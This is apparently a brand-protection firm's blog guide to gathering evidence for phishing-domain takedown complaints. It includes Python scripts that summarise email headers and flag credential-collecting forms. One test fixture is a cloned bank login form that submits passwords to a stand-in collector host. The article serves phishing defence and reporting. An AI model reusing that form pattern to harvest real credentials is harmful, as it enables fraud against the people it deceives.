The Domain Name System (DNS) is designed to connect users to services effortlessly. However, bad actors exploit this system for malicious purposes, generally known as DNS Abuse. Understanding what constitutes DNS Abuse, specifically phishing, and knowing how to present evidence to Registrars and Registries is critical for getting these properties removed quickly and efficiently.
Too often, users with legitimate complaints against phishing domain names fail to provide sufficient evidence for the Registrar or Registry to make an informed decision. Since it is not their responsibility to investigate the details of a case, it falls on the complainant to present clear, compelling evidence that leaves no doubt the reported domain constitutes abuse under the DNS Abuse Framework. Let’s take a look at how you can submit a slam dunk phishing complaint.
What Is DNS Abuse?
DNS Abuse is defined by the DNS Abuse Framework as any activity involving domain names that falls into one of these categories:
- Phishing: Deceptive practices that trick users into sharing sensitive information like passwords or financial details.
- Malware: Software designed to disrupt, damage, or gain unauthorized access to systems.
- Botnets: Networks of infected devices used for malicious activities.
- Pharming: Redirecting users to fraudulent websites without their consent.
- Spam (when tied to abuse): Bulk email used to deliver phishing, malware, or other malicious payloads.
The DNS Abuse Framework establishes a shared understanding for registrars and registries to detect and address these abuses. Registrars and registries are obligated to act against DNS Abuse but are limited to cases where the abuse clearly fits these definitions.
The Role of Registrars and Registries
Registrars and registries can take decisive action only when the abuse clearly meets the DNS Abuse Framework’s criteria. This ensures due process and avoids penalizing legitimate registrants. Actions they can take include:
- Suspending the domain name.
- Disabling DNS resolution to prevent access.
- Working with the registrant to address compromised domains.
Phishing Under the DNS Abuse Framework
Phishing is one of the most common forms of DNS Abuse. It typically involves:
- Domains designed to impersonate legitimate brands or services.
- Deceptive websites or emails that collect sensitive user data.
- Misleading links that redirect users to fraudulent sites.
Phishing domain names are often registered in bulk and can include both branded and generic names. These domains are typically newly registered and frequently use WHOIS privacy services to conceal the registrant’s identity.
When a phishing domain name complaint is submitted, the DNS Abuse Framework requires registrars and registries to act on specific, credible evidence to ensure fair treatment of domain registrants and prevent unwarranted suspensions. Unfortunately, the framework is sometimes misused to target legitimate websites, making it important for registrars and registries to evaluate each case with care and precision. This places the onus on the complainant to provide clear, unambiguous evidence of the phishing attack. It is not the job of the evaluator to investigate your case, so the complainant needs to provide the evidence required to make a determination.
When Website Content Abuse Becomes Phishing: Navigating the DNS Abuse Framework
The DNS Abuse Framework clearly distinguishes between DNS Abuse and Website Content Abuse, setting a higher threshold for intervention by registrars and registries. Website Content Abuse, such as trademark infringement, counterfeit goods, and brand impersonation, typically falls outside the scope of DNS Abuse. Registrars and registries are not obligated to act on Website Content Abuse unless it violates their Acceptable Use Policies (AUPs) or a court order is presented. This separation is intentional, as Website Content Abuse often involves subjective legal interpretations that vary across jurisdictions, unlike DNS Abuse, which has more universally accepted definitions.
However, there are instances where Website Content Abuse can cross into phishing and therefore qualify as DNS Abuse under the framework. This occurs when the content on the website is used to deceive users into providing sensitive information. For example, if a site impersonates a legitimate brand and hosts a fake login page or payment portal, it moves beyond mere impersonation into phishing. Collecting user credentials, passwords, or payment information through deception is a hallmark of phishing. Another example is if a site solicits users to enter personal details under the guise of verification, contests, or promotions. In these cases, the registrar or registry may be required to act, as the domain now fits the definition of phishing under the framework. To trigger action, the complainant must provide specific and credible evidence of this phishing activity, such as screenshots of the fake login page, customer complaints, or logs showing user data being collected.
Proving a Domain Fits the Definition of Phishing
To ensure a registrar or registry can confidently take action against a domain, certain pieces of evidence are considered important in an assessment. Here are the key elements of proof for building a compelling case:
Deceptive Content:
- Screenshots or records of the domain/site mimicking a legitimate brand (e.g., logos, layout, or text). Providing a comparison of the legitimate and phishing site can assist in establishing impersonation.
User Interaction Evidence:
- Proof that the domain is collecting sensitive user data (e.g., login pages or payment forms). This is important information to include in any evidence pack. You can examine the HTML source code, and form submission actions to identify phishing kits and other interesting intelligence.
- Examples of fraudulent emails or messages directing users to the domain are crucial evidence. Screenshots of these messages are highly valuable, and gathering multiple examples from different sources will strengthen your claim. Including the email header, if possible, is recommended, as it provides pathway information and other critical intelligence. You can also provide email logs demonstrating phishing campaigns originating from or linked to the domain.
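The "pathway information" in an email header is the chain of Received headers, which each mail server prepends as the message passes through it. The script below is an added example, not Brandsec's code or tooling: it parses a raw message with Python's standard library, lists the Received hops in delivery order, summarises the sender headers, and pulls out every URL in the body that points at the reported domain, so the complaint can quote exactly which link leads to the phishing site. The sample message is constructed; brand-login-example.test and victim-org.example are placeholder hosts, not real indicators.

```python
"""Summarise a phishing email for a DNS Abuse evidence pack.

Added example (not Brandsec's code). Uses only the standard library so it
can run offline against a saved .eml file. The message below is constructed;
the hosts are placeholders on the reserved .test / .example domains.
"""
import email
import re
from email import policy
from urllib.parse import urlparse

# Constructed sample message: two Received hops, an HTML body with one link to
# the reported domain and one unrelated link.
SAMPLE_EML = """\
Return-Path: <alerts@brand-login-example.test>
Received: from mail.victim-org.example (mail.victim-org.example [192.0.2.10])
    by mx.victim-org.example with ESMTP id abc123; Tue, 4 Feb 2025 10:02:11 +0000
Received: from relay.brand-login-example.test (relay.brand-login-example.test [198.51.100.7])
    by mail.victim-org.example with ESMTPS; Tue, 4 Feb 2025 10:02:09 +0000
From: "Example Bank Security" <alerts@brand-login-example.test>
To: customer@victim-org.example
Subject: Verify your account within 24 hours
Date: Tue, 4 Feb 2025 10:02:05 +0000
Message-ID: <20250204100205.1@relay.brand-login-example.test>
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your account is locked. <a href="https://brand-login-example.test/verify?id=42">Verify now</a>
or visit http://www.example.com/help for support.</p>
</body></html>
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def received_chain(raw_message: str) -> list[str]:
    """Return the Received headers oldest-first (sender side first).

    MTAs prepend Received headers, so the last one in the message is the
    earliest hop; reversing gives the pathway in delivery order. Folded
    header lines are joined into one line for readability.
    """
    msg = email.message_from_string(raw_message, policy=policy.default)
    hops = [" ".join(h.split()) for h in msg.get_all("Received", [])]
    return list(reversed(hops))


def sender_summary(raw_message: str) -> dict:
    """Collect the sender-identity headers worth quoting in a complaint."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    return {
        "from": str(msg["From"]),
        "return_path": str(msg["Return-Path"]),
        "message_id": str(msg["Message-ID"]),
        "subject": str(msg["Subject"]),
        "date": str(msg["Date"]),
    }


def urls_for_domain(raw_message: str, domain: str) -> list[str]:
    """Extract body URLs whose host is the reported domain or a subdomain of it."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body is not None else ""
    domain = domain.lower()
    matches = []
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host == domain or host.endswith("." + domain):
            matches.append(url)
    return matches


if __name__ == "__main__":
    for i, hop in enumerate(received_chain(SAMPLE_EML), 1):
        print(f"hop {i}: {hop}")
    print(sender_summary(SAMPLE_EML))
    print(urls_for_domain(SAMPLE_EML, "brand-login-example.test"))
```

Only the earliest Received hop (the one closest to the sender) is outside the receiving organisation's control; the ones added by your own mail servers are trustworthy, which is why the chain is printed oldest-first. Attach the full raw headers to the complaint as well, since this summary is a reading aid rather than a substitute for them.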
Technical Evidence:
- WHOIS data showing registrant information that may indicate malicious intent (e.g., patterns of abuse across multiple domains). An important data point is the date of registration. New registrations are a big indicator.
- DNS records indicating connections to known phishing infrastructure. Cybersecurity experts identify DNS connections to phishing infrastructure by analyzing A, CNAME, and MX records, reverse DNS, SSL certificates, and WHOIS data, cross-referencing threat feeds like PhishTank, AbuseIPDB, and OpenPhish to detect shared infrastructure and suspicious IPs.
- Deeper evidence helps. Cybersecurity experts can discover user interaction evidence by analyzing the website’s structure, network traffic, and form actions using tools like browser DevTools, Burp Suite, and headless browsers to trace sensitive data collection. They can identify phishing kits through directory scanning, WHOIS/DNS analysis, and malware analysis to locate files like submit.php and config.php that handle stolen user data.
Customer Reports:
- Complaints from users who have been misled or harmed by the domain. This can be in email form from the impacted user. This information should be verifiable if needed.
- Proof of financial losses or data breaches linked to interactions with the domain. This can be in the form of financial records.
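The two technical checks above that can be done from a saved copy of the page (which forms it contains, where they submit, and which sensitive fields they collect) and from the WHOIS record (how recently the domain was registered) are easy to automate into a structured summary for the evidence pack. The script below is an added example, not Brandsec's code: it parses the page HTML with the standard library, records each form's action and whether that action leaves the reported domain, flags password, card and identity fields, and computes the registration age from the WHOIS creation date. The HTML is constructed; brand-login-example.test and collector.example are placeholders, and the 30-day "newly registered" threshold is this example's assumption, not a framework rule.

```python
"""Structured evidence summary for a suspected phishing page.

Added example (not Brandsec's code). Input is the saved HTML of the reported
page and the WHOIS 'Creation Date'; output is a dictionary you can attach to
a complaint alongside the screenshots. Hosts below are placeholders.
"""
from dataclasses import asdict, dataclass, field
from datetime import date
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urljoin, urlparse

# Field-name fragments that indicate sensitive data collection (assumed list).
SENSITIVE_FIELDS = {
    "password": ("password", "passwd", "pwd"),
    "card": ("cardnumber", "cardno", "ccnum", "cvv", "cvc", "expiry"),
    "identity": ("ssn", "dob", "username", "email", "accountnumber"),
}
NEW_REGISTRATION_DAYS = 30  # assumed threshold for "newly registered"

# Constructed sample: a cloned login form posting to a third-party host and a
# harmless on-site search form.
SAMPLE_HTML = """
<html><body>
<img src="/static/examplebank-logo.png" alt="Example Bank">
<form id="login" method="post" action="https://collector.example/submit.php">
  <input type="text" name="username" placeholder="User ID">
  <input type="password" name="password">
  <input type="hidden" name="session" value="abc">
  <input type="submit" value="Sign in">
</form>
<form method="get" action="/search">
  <input type="text" name="q">
</form>
</body></html>
"""


@dataclass
class FormEvidence:
    action: str            # absolute URL the form submits to
    method: str
    off_domain: bool       # True when the action host differs from the page host
    fields: list[str] = field(default_factory=list)     # user-entered inputs
    sensitive: list[str] = field(default_factory=list)  # categories matched


class FormCollector(HTMLParser):
    """Collect forms, their actions and user-entered inputs from page HTML."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.page_host = (urlparse(page_url).hostname or "").lower()
        self.forms: list[FormEvidence] = []
        self._current: Optional[FormEvidence] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            action = urljoin(self.page_url, a.get("action") or "")
            host = (urlparse(action).hostname or "").lower()
            self._current = FormEvidence(
                action=action,
                method=(a.get("method") or "get").lower(),
                off_domain=host != self.page_host,
            )
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            input_type = (a.get("type") or "text").lower()
            name = (a.get("name") or a.get("id") or "").strip()
            if not name or input_type in ("submit", "hidden", "button"):
                return  # not data the user types in
            self._current.fields.append(name)
            key = "password" if input_type == "password" else \
                name.lower().replace("_", "").replace("-", "")
            for category, words in SENSITIVE_FIELDS.items():
                if any(w in key for w in words) and category not in self._current.sensitive:
                    self._current.sensitive.append(category)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyse_forms(page_url: str, html: str) -> list[FormEvidence]:
    parser = FormCollector(page_url)
    parser.feed(html)
    parser.close()
    return parser.forms


def registration_age_days(creation_date: str, as_of: date) -> int:
    """Days between the WHOIS creation date (ISO 8601, date part used) and as_of."""
    return (as_of - date.fromisoformat(creation_date[:10])).days


def evidence_summary(page_url: str, html: str, creation_date: str, as_of: date) -> dict:
    forms = analyse_forms(page_url, html)
    age = registration_age_days(creation_date, as_of)
    return {
        "domain": urlparse(page_url).hostname,
        "registration_age_days": age,
        "newly_registered": age < NEW_REGISTRATION_DAYS,
        "collects_sensitive_data": any(f.sensitive for f in forms),
        "forms": [asdict(f) for f in forms],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(evidence_summary("https://brand-login-example.test/login",
                                      SAMPLE_HTML, "2025-01-30", date(2025, 2, 4)), indent=2))
```

A form whose action is off-domain and which collects a password is the "form submission action" evidence the text asks for; the exact action URL is worth quoting in the complaint because it identifies the collection endpoint independently of the page's visual impersonation.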
Types of Evidence Needed
When reporting phishing, it’s essential to present evidence in a structured manner. To prove the domain name is a phishing property designed to defraud consumers, here are some examples of the evidence to include:
Visual Evidence:
- Screenshots.
- Copies of phishing emails or SMS messages.
Transactional Records:
- Bank or payment receipts.
- Evidence of unauthorized payments processed via the website.
Technical Reports:
- Logs showing phishing-related traffic or behavior.
- Connections to blacklisted IPs or other flagged domains.
Third-Party Verification:
- Reports from security tools or organizations confirming the domain’s involvement in phishing.
- Verification from trusted notifiers with expertise in phishing detection.
Partnering with an Experienced Enforcement Agency for DNS Abuse Takedowns
Using an experienced enforcement agency like Brandsec can significantly improve the success rate of DNS abuse takedowns. Registrars and registries require precise, verifiable evidence before taking action, and many complaints are rejected due to insufficient proof. Brandsec’s expertise ensures that every case is supported by comprehensive evidence, such as screenshots, WHOIS data, DNS records, and user complaints. Their familiarity with the DNS Abuse Framework means complaints are formatted correctly, clearly demonstrating how the domain meets the criteria for phishing abuse.
Brandsec’s established relationships with registrars and registries further accelerate the takedown process. Unlike general complaints that may be deprioritized, reports from trusted enforcement agencies like Brandsec are given higher credibility and faster attention. Their use of advanced detection tools and connections to phishing intelligence databases allows them to uncover linked domains and persistent threat actors, ensuring broader protection. By partnering with a trusted enforcement agency, businesses can reduce the risk of delays and increase the likelihood of swift, decisive action against abusive domains.
Summary
Phishing is a serious threat, and the DNS Abuse Framework provides a structured process for addressing it. However, registrars and registries require specific, credible evidence to act confidently. By understanding what constitutes DNS Abuse and providing robust evidence of phishing activity, registrants and affected parties can effectively escalate cases and secure timely resolution.
Whether you’re a brand owner, security professional, or affected user, knowing the framework and evidence requirements is key to making the internet a safer place for everyone.
About brandsec
brandsec is a team of highly experienced domain name management and online brand protection experts. We provide corporate domain name management and brand enforcement services, helping brands eliminate phishing platforms across the internet. Supporting some of the largest brands in the region, we offer innovative solutions to combat threats across multiple industries.